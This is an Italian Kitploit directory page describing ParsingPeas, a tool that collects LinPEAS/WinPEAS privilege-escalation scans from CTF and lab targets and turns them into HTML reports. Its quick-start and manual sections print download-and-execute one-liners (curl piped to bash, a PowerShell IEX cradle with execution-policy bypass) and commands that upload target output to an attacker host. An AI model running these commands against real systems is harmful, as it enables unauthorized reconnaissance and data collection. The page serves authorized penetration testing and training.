Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ParsingPeas — Parser HTML per l'output di PEAS con funzionalità aggiuntive | Kitploit
Strumenti/GitHubGitHub/yuvalmil/parsingpeas
Escalation di PrivilegiScripting e AutomazioneRaccolta InformazioniPost-ExploitCTFPenetration TestingUtilità e FrameworkApprendimento e FormazioneLab e Pratica
GitHubyuvalmil/parsingpeas

ParsingPeas

Parser HTML per l'output di PEAS con funzionalità aggiuntive

1591432 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

ParsingPeas 🥒

Raccolta automatizzata di PEASS + un report HTML pulito e portatile per lavoro di escalation dei privilegi in CTF e laboratori.

License: MIT Python 3.8+

Esegui un comando sul target. ParsingPeas recupera LinPEAS/WinPEAS dal tuo host Kali, esegue la scansione, rimanda indietro l'output e lo trasforma in un singolo report HTML autonomo che puoi leggere, cercare, vagliare e conservare — niente trasferimento manuale di file, niente internet sul target.


Screenshot

Riepilogo report — sezioni raggruppate per le categorie di LinPEAS, con pallini di rilevamento e una barra dei risultati:

Riepilogo report

Solo risultati — un clic filtra il report e la barra laterale mostrando solo le sezioni con elementi critici/alti:

Solo risultati

Output terminale completo — la scansione completa, fedelmente colorata; ricercabile con Ctrl-F:

Output terminale completo


Perché

L'output grezzo di PEASS è un muro di testo scorrevole nel terminale che scompare nel momento in cui la tua shell muore. ParsingPeas:

  • Automatizza il lavoro manuale — niente scp, niente hosting di linpeas da te, niente copia-incolla dell'output di nuovo su Kali.
  • Lo salva — ogni scansione diventa un report HTML con timestamp sul tuo host.
  • Lo rende navigabile — l'output è suddiviso nelle vere sezioni di LinPEAS con una barra laterale categorizzata, evidenziazioni dei risultati e ricerca full-text.
  • Viaggia bene — ogni report è un singolo file .html autonomo che puoi copiare dalla macchina, archiviare o aprire offline facendo doppio clic.

È presentazione + logistica, non un motore di exploit: conserva fedelmente la colorazione e i risultati di PEASS invece di cercare di interpretarli.


Caratteristiche

  • Flusso di lavoro con una riga — il target scarica il wrapper dal tuo host, esegue PEASS e invia automaticamente il risultato tramite POST.
  • Funziona offline sul target — tutto è servito dal tuo host Kali.
  • Analisi fedele delle sezioni — segue la reale gerarchia di intestazioni a due livelli di LinPEAS (sezioni principali + sotto-controlli); i link di hacktricks e le righe di controllo rimangono come contenuto senza inquinare l'indice.
  • Report autonomi — l'output del terminale è incorporato inline; un file, nessun file accessorio, si apre tramite file://.
  • Vista interattiva del report:
    • Indice nella barra laterale raggruppato per sezioni di PEASS, con conteggi critici/alti.
    • Barra dei risultati — chip N critici / N alti che saltano tra le sezioni contrassegnate, più una legenda dei colori.
    • Filtro solo risultati per un rapido triage.
    • Toggle interruzione di riga (attivo di default — niente più righe troncate).
    • Scrollspy — sezione corrente evidenziata nell'indice mentre scorri.
    • Intestazioni di sezione sticky e pallini "segna come letto" che persistono (localStorage, per report).
    • Badge nell'intestazione per l'utente corrente (rosso se root) e sistema operativo.
  • Scheda Output Terminale Completo — la scansione completa, interamente colorata, renderizzata in un'unica passata in modo che la Ctrl-F del browser cerchi in tutto.
  • Tema scuro attenuato — facile per gli occhi in sessioni lunghe.
  • Linux e Windows — LinPEAS (bash) e WinPEAS (PowerShell).

Avvio rapido

Sul tuo host Kali

root@kitploit:~
git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh                      # scarica LinPEAS + WinPEAS in scripts/
pip3 install -r requirements.txt
python3 receiver.py             # serve su http://0.0.0.0:8005

Lascia receiver.py in esecuzione. Trova l'IP tramite cui il target ti raggiungerà:

  • HTB / VPN: il tuo indirizzo tun0 — ip -4 addr show tun0
  • LAN: il normale IP della tua interfaccia

Sul target

Linux/Unix (usa curl, fallback su wget):

root@kitploit:~
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash

Windows (PowerShell / reverse shell):

root@kitploit:~
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"

Scegli la riga singola corrispondente al sistema operativo del target — Linux serve LinPEAS, Windows serve WinPEAS.

Visualizza il report

I report vengono generati sul tuo host Kali in ./reports/. Puoi:

  • Sfogliare l'indice su http://YOUR_KALI_IP:8005 e fare clic su un report, oppure
  • Aprire direttamente il file generato — è autonomo:
    root@kitploit:~
    xdg-open ./reports/report_<host>_<timestamp>.html
    

Copia quel singolo .html dove vuoi; funziona da solo.


Come funziona

root@kitploit:~
Target → scarica il wrapper da Kali → esegue PEASS → invia output tramite POST → Kali analizza → report HTML autonomo

Il target non ha mai bisogno di internet — il wrapper e i binari di PEASS sono tutti serviti dal tuo host.


Utilizzo del report

  • Scheda Riepilogo Report — sezioni raggruppate per categoria PEASS nella barra laterale. Pallini rossi/gialli segnano le sezioni con risultati critici/alti. Usa i chip Risultati per saltare direttamente a essi, oppure Solo risultati per nascondere tutto il resto.
  • Scheda Output Terminale Completo — la scansione colorata completa. Basta premere Ctrl-F per cercare; l'intero output è renderizzato, quindi la ricerca nativa copre tutto.
  • Clicca su un pallino di rilevamento per segna sezione come letta — rimane letto quando riapri il report.

Uso manuale

Se la riga singola fallisce, fallo manualmente.

Linux:

root@kitploit:~
# Sul target
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# Invia indietro
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
  --data-binary @/tmp/out.txt http://KALI_IP:8005/upload

Windows (PowerShell):

root@kitploit:~
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
  -Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
  -InFile $env:TEMP\out.txt

Analizza un dump PEASS che hai già:

root@kitploit:~
python3 parser.py /path/to/peas_output.txt   # scrive un report HTML in ./reports/

Configurazione

Modifica l'inizio di receiver.py:


Risoluzione dei problemi

  • Impossibile scaricare lo script? curl http://KALI_IP:8005/health per verificare la connettività; apri il firewall con sudo ufw allow 8005/tcp.
  • 404 su /get-linpeas? Esegui ./setup.sh per recuperare i binari PEASS.
  • Nessun output live in una reverse shell PowerShell? Previsto — la scansione viene comunque eseguita; controlla il tuo receiver per la conferma del caricamento.

Sicurezza

⚠️ Solo per test di penetrazione autorizzati, CTF e uso in laboratorio.

  • Nessuna autenticazione — eseguilo solo su reti isolate/CTF, dietro un firewall.
  • I valori delle intestazioni di upload sono sanificati e gli upload sono limitati per dimensione, ma il server non è indurito per esposizione internet ostile.

Crediti

Costruito su PEASS-ng di @carlospolop. ParsingPeas si limita a raccogliere e presentare il suo output.


Licenza MIT · Contributi benvenuti

Scarica lo strumento
ImpostazioneDefaultNote
Porta8005cambia la riga app.run(... port=...)
OUTPUT_DIR./received_outputsscansioni grezze caricate
REPORTS_DIR./reportsreport HTML generati
SCRIPTS_DIR./scriptsbinari LinPEAS/WinPEAS
MAX_UPLOAD_SIZE10 MBapplicato — upload più grandi ottengono HTTP 413